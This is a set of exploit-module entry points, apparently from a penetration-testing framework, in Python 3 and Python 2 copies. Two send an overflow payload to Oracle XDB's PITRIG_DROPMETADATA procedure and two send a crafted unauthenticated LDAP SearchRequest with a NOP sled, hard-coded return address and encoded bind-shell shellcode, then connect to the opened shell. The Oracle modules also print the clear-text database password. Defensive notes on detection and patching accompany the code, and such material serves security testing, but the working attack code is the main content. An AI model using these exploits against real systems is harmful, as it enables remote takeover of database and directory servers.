def run(self) -> bool:
    """Exploit module entry point: Oracle XDB ``PITRIG_DROPMETADATA`` overflow.

    Opens an authenticated cx_Oracle session to the target listener using
    ``self.user``/``self.password``, builds an oversized string out of the
    encoded payload plus 0x27 filler and ``BBBB``, and passes that string as
    both the OWNER and NAME arguments of
    ``XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA``.  After a fixed pause it
    spawns a terminal against ``localhost:listenPort``.

    Defender's view: the call shape is distinctive -- an anonymous PL/SQL
    block invoking PITRIG_DROPMETADATA with two bind values of roughly 1 KB
    consisting of 0x27 bytes and ``BBBB`` -- so database auditing on that
    package, or inspection of the TNS traffic, exposes attempts.  The XDB
    schema belongs to Oracle XML DB; the package is simply absent on
    instances without that component, and the vendor fix removes the
    overflow where it is installed.  Note also that the full connect string,
    password included, is echoed to the module's output (see below).

    Reads ``self.target``, ``self.port``, ``self.ostype``, ``self.sid``,
    ``self.payload``, ``self.listenPort``, ``self.user``, ``self.password``
    and ``self.gom`` (output helper).  Unset options are replaced by the
    defaults below and each replacement is reported.

    Returns:
        True once the PL/SQL call has been issued and the terminal spawned.
        Connection or execution errors from cx_Oracle propagate unchanged.
    """
    # Substitute module defaults for any option the caller left unset.
    if self.target == "" or self.target is None:
        self.target = "localhost"
    if self.port == 0 or self.port is None:
        self.port = 1521
    if self.ostype < 1:
        self.gom.echo("[+] No OS selected. Using Linux (ostype = 1)")
        self.ostype = 1
    if self.sid == "":
        self.gom.echo("[+] No sid selected, using ORCL")
        self.sid = "ORCL"
    if self.payload < 1:
        self.gom.echo(
            "[+] No payload selected. Using 'bindshell' (payload = 2)")
        self.payload = 2
    if self.listenPort == 0:
        self.gom.echo("[+] No listen port selected, using 4444")
        self.listenPort = 4444
    # Connect descriptor with the clear-text credentials embedded.  It is
    # echoed verbatim on the next lines, so the password ends up wherever
    # self.gom.echo writes (console, log, session capture).
    link = "%s/%s@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=%s)(PORT=%d)))" % (
        self.user, self.password, self.target, self.port)
    link += "(CONNECT_DATA=(SERVICE_NAME=%s)))" % self.sid
    self.gom.echo(link)
    connection = cx_Oracle.connect(link)
    # Empty transaction round-trip before the call; the reason is not
    # recorded in the module.
    connection.rollback()
    connection.commit()
    cur = connection.cursor()
    # Size the payload is left-padded to with 0x27 bytes.
    adjustSize = 506
    # Payload is generated for 0.0.0.0:listenPort and run through the
    # project's x86XorEncode helper (encoding scheme not shown here).
    sc = getShellcode("0.0.0.0", self.listenPort, self.ostype, self.payload)
    sc = x86XorEncode(sc)
    self.gom.echo("[+] Len of encoded shellcode is", len(sc))
    sc = chr(0x27) * (adjustSize - len(sc)) + sc
    addr = "BBBB"
    data = sc
    data += addr
    data += data + "\x27" * (len(data) - 1024)
    # Both bind parameters receive the same oversized string.  This exact
    # statement text plus ~1 KB bind values is the audit/IDS signature.
    cur.execute(
        "BEGIN XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(OWNER=>:1,NAME=>:2); END;",
        (data, data))
    self.gom.echo("[+] Exploit sended. Connecting to port", self.listenPort)
    # Fixed pause, then attach a terminal to localhost:listenPort.
    time.sleep(3)
    spawnTerminal("localhost", self.listenPort)
    return True
def run(self):
    """Exploit module entry point: Oracle XDB ``PITRIG_DROPMETADATA`` overflow.

    Python 2 variant (``print`` statements).  Opens an authenticated
    cx_Oracle session to the target listener using
    ``self.user``/``self.password``, builds an oversized string out of the
    encoded payload plus 0x27 filler and ``BBBB``, and passes that string as
    both the OWNER and NAME arguments of
    ``XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA``.  After a fixed pause it
    spawns a terminal against ``localhost:listenPort``.

    Defender's view: the call shape is distinctive -- an anonymous PL/SQL
    block invoking PITRIG_DROPMETADATA with two bind values of roughly 1 KB
    consisting of 0x27 bytes and ``BBBB`` -- so database auditing on that
    package, or inspection of the TNS traffic, exposes attempts.  The XDB
    schema belongs to Oracle XML DB; the package is simply absent on
    instances without that component, and the vendor fix removes the
    overflow where it is installed.  Note also that the full connect string,
    password included, is printed to stdout (see below).

    Reads ``self.target``, ``self.port``, ``self.ostype``, ``self.sid``,
    ``self.payload``, ``self.listenPort``, ``self.user`` and
    ``self.password``.  Unset options are replaced by the defaults below and
    each replacement is reported.

    Returns:
        True once the PL/SQL call has been issued and the terminal spawned.
        Connection or execution errors from cx_Oracle propagate unchanged.
    """
    # Substitute module defaults for any option the caller left unset.
    if self.target == "" or self.target is None:
        self.target = "localhost"
    if self.port == 0 or self.port is None:
        self.port = 1521
    if self.ostype < 1:
        print "[+] No OS selected. Using Linux (ostype = 1)"
        self.ostype = 1
    if self.sid == "":
        print "[+] No sid selected, using ORCL"
        self.sid = "ORCL"
    if self.payload < 1:
        print "[+] No payload selected. Using 'bindshell' (payload = 2)"
        self.payload = 2
    if self.listenPort == 0:
        print "[+] No listen port selected, using 4444"
        self.listenPort = 4444
    # Connect descriptor with the clear-text credentials embedded.  It is
    # printed verbatim below, so the password ends up on stdout / in any
    # captured session log.
    link = "%s/%s@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=%s)(PORT=%d)))" % (
        self.user, self.password, self.target, self.port,
    )
    link += "(CONNECT_DATA=(SERVICE_NAME=%s)))" % self.sid
    print link
    connection = cx_Oracle.connect(link)
    # Empty transaction round-trip before the call; the reason is not
    # recorded in the module.
    connection.rollback()
    connection.commit()
    cur = connection.cursor()
    # Size the payload is left-padded to with 0x27 bytes.
    adjustSize = 506
    # Payload is generated for 0.0.0.0:listenPort and run through the
    # project's x86XorEncode helper (encoding scheme not shown here).
    sc = getShellcode("0.0.0.0", self.listenPort, self.ostype, self.payload)
    sc = x86XorEncode(sc)
    print "[+] Len of encoded shellcode is", len(sc)
    sc = chr(0x27) * (adjustSize - len(sc)) + sc
    addr = "BBBB"
    data = sc
    data += addr
    data += data + "\x27" * (len(data) - 1024)
    # Both bind parameters receive the same oversized string.  This exact
    # statement text plus ~1 KB bind values is the audit/IDS signature.
    cur.execute("BEGIN XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(OWNER=>:1,NAME=>:2); END;", (data, data))
    print "[+] Exploit sended. Connecting to port", self.listenPort
    # Fixed pause, then attach a terminal to localhost:listenPort.
    time.sleep(3)
    spawnTerminal("localhost", self.listenPort)
    return True
def run(self) -> bool:
    """Exploit module entry point: LDAP SearchRequest stack overflow (Linux/x86).

    Builds a single BER-encoded LDAPv3 SearchRequest (messageID 1,
    wholeSubtree scope, ``(objectClass=*)`` present filter, no attribute
    list) whose baseObject is ``dc=`` followed by a nominally 4099-byte blob:
    a 0x90 sled, one hard-coded return address and the alpha-encoded
    payload.  The request is sent without any preceding BindRequest over one
    TCP connection, which is closed immediately; after a fixed pause a
    terminal is spawned against ``localhost:listenPort``.

    Defender's view: the request is trivially distinguishable from real
    directory traffic -- a 4143-byte SearchRequest carrying a ~4 KB
    baseObject that starts with ``dc=`` and consists mostly of 0x90 bytes --
    and is a straightforward IDS signature on the LDAP port.  The return
    address only fits the specific build named in the comment below, so on
    other builds the attempt would most likely crash the directory process
    rather than succeed; unexpected restarts of the LDAP daemon are the
    host-side indicator.  The root cause is a server that accepts a multi-KB
    baseObject from an unauthenticated client into a fixed stack buffer;
    the vendor fix for the affected server is the mitigation.

    Reads ``self.target``, ``self.port``, ``self.ostype``, ``self.payload``,
    ``self.listenPort``, ``self.timeout`` and ``self.gom`` (output helper).
    Unset options are replaced by the defaults below and each replacement
    is reported.

    Returns:
        True once the packet has been sent and the terminal spawned.
        Socket errors (connect/send, including the configured timeout)
        propagate unchanged.
    """
    # Substitute module defaults for any option the caller left unset.
    if self.target == "" or self.target is None:
        self.target = "localhost"
    if self.port == 0 or self.port is None:
        self.port = 389
    if self.ostype < 1:
        self.gom.echo("[+] No OS selected. Using Linux (ostype = 1)")
        self.ostype = 1
    if self.payload < 1:
        self.gom.echo(
            "[+] No payload selected. Using 'bindshell' (payload = 2)")
        self.payload = 2
    if self.listenPort == 0:
        self.gom.echo("[+] No listen port selected, using 4444")
        self.listenPort = 4444
    # Size the encoded payload is left-padded to with 0x90 (NOP) bytes.
    adjustSize = 243
    # Payload is generated for 0.0.0.0:listenPort and run through the
    # project's x86AlphaEncode helper (encoding scheme not shown here).
    sc = getShellcode("0.0.0.0", self.listenPort, self.ostype, self.payload)
    sc = x86AlphaEncode(sc)
    sc = "\x90" * (adjustSize - len(sc)) + sc
    #
    # The address we will use is 0xffffe777 (JMP ESP in Debian's linux-gate.so)
    # -- build-specific; the value is little-endian below.
    #
    addr = "\x77\xe7\xff\xff"
    # Overflow body: 2076-byte sled, 4-byte address, sled up to 2019 bytes
    # ending in the padded payload -> 4099 bytes when len(sc) <= 243.
    theLine = '\x90' * 2076 + addr + '\x90' * (2019 - len(sc)) + sc
    # BER: SEQUENCE len 0x102f, INTEGER messageID 1, [APPLICATION 3]
    # SearchRequest len 0x1028, OCTET STRING baseObject len 0x1006 = 'dc=' + body.
    pkt = '0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc='
    pkt += theLine
    # Remaining SearchRequest fields: scope=2 (wholeSubtree), derefAliases=0,
    # sizeLimit=0, timeLimit=0, typesOnly=FALSE, present filter [7]
    # "objectClass", empty attribute SEQUENCE.
    pkt += '\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00'
    # One unauthenticated TCP exchange: connect, send, close.  Note that
    # setdefaulttimeout changes the process-wide default for every socket
    # created afterwards, not just this one.
    socket.setdefaulttimeout(self.timeout)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((self.target, self.port))
    s.send(pkt)
    s.close()
    self.gom.echo("[+] Exploit sended. Connecting to port", self.listenPort)
    # Fixed pause, then attach a terminal to localhost:listenPort.
    time.sleep(3)
    spawnTerminal("localhost", self.listenPort)
    return True
def run(self):
    """Exploit module entry point: LDAP SearchRequest stack overflow (Linux/x86).

    Python 2 variant (``print`` statements).  Builds a single BER-encoded
    LDAPv3 SearchRequest (messageID 1, wholeSubtree scope,
    ``(objectClass=*)`` present filter, no attribute list) whose baseObject
    is ``dc=`` followed by a nominally 4099-byte blob: a 0x90 sled, one
    hard-coded return address and the alpha-encoded payload.  The request
    is sent without any preceding BindRequest over one TCP connection,
    which is closed immediately; after a fixed pause a terminal is spawned
    against ``localhost:listenPort``.

    Defender's view: the request is trivially distinguishable from real
    directory traffic -- a 4143-byte SearchRequest carrying a ~4 KB
    baseObject that starts with ``dc=`` and consists mostly of 0x90 bytes --
    and is a straightforward IDS signature on the LDAP port.  The return
    address only fits the specific build named in the comment below, so on
    other builds the attempt would most likely crash the directory process
    rather than succeed; unexpected restarts of the LDAP daemon are the
    host-side indicator.  The root cause is a server that accepts a multi-KB
    baseObject from an unauthenticated client into a fixed stack buffer;
    the vendor fix for the affected server is the mitigation.

    Reads ``self.target``, ``self.port``, ``self.ostype``, ``self.payload``,
    ``self.listenPort`` and ``self.timeout``.  Unset options are replaced by
    the defaults below and each replacement is reported.

    Returns:
        True once the packet has been sent and the terminal spawned.
        Socket errors (connect/send, including the configured timeout)
        propagate unchanged.
    """
    # Substitute module defaults for any option the caller left unset.
    if self.target == "" or self.target is None:
        self.target = "localhost"
    if self.port == 0 or self.port is None:
        self.port = 389
    if self.ostype < 1:
        print "[+] No OS selected. Using Linux (ostype = 1)"
        self.ostype = 1
    if self.payload < 1:
        print "[+] No payload selected. Using 'bindshell' (payload = 2)"
        self.payload = 2
    if self.listenPort == 0:
        print "[+] No listen port selected, using 4444"
        self.listenPort = 4444
    # Size the encoded payload is left-padded to with 0x90 (NOP) bytes.
    adjustSize = 243
    # Payload is generated for 0.0.0.0:listenPort and run through the
    # project's x86AlphaEncode helper (encoding scheme not shown here).
    sc = getShellcode("0.0.0.0", self.listenPort, self.ostype, self.payload)
    sc = x86AlphaEncode(sc)
    sc = "\x90"*(adjustSize-len(sc)) + sc
    #
    # The address we will use is 0xffffe777 (JMP ESP in Debian's linux-gate.so)
    # -- build-specific; the value is little-endian below.
    #
    addr = "\x77\xe7\xff\xff"
    # Overflow body: 2076-byte sled, 4-byte address, sled up to 2019 bytes
    # ending in the padded payload -> 4099 bytes when len(sc) <= 243.
    theLine = '\x90'*2076 + addr+ '\x90'*(2019-len(sc)) + sc
    # BER: SEQUENCE len 0x102f, INTEGER messageID 1, [APPLICATION 3]
    # SearchRequest len 0x1028, OCTET STRING baseObject len 0x1006 = 'dc=' + body.
    pkt = '0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc='
    pkt += theLine
    # Remaining SearchRequest fields: scope=2 (wholeSubtree), derefAliases=0,
    # sizeLimit=0, timeLimit=0, typesOnly=FALSE, present filter [7]
    # "objectClass", empty attribute SEQUENCE.
    pkt += '\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00'
    # One unauthenticated TCP exchange: connect, send, close.  Note that
    # setdefaulttimeout changes the process-wide default for every socket
    # created afterwards, not just this one.
    socket.setdefaulttimeout(self.timeout)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((self.target, self.port))
    s.send(pkt)
    s.close()
    print "[+] Exploit sended. Connecting to port", self.listenPort
    # Fixed pause, then attach a terminal to localhost:listenPort.
    time.sleep(3)
    spawnTerminal("localhost", self.listenPort)
    return True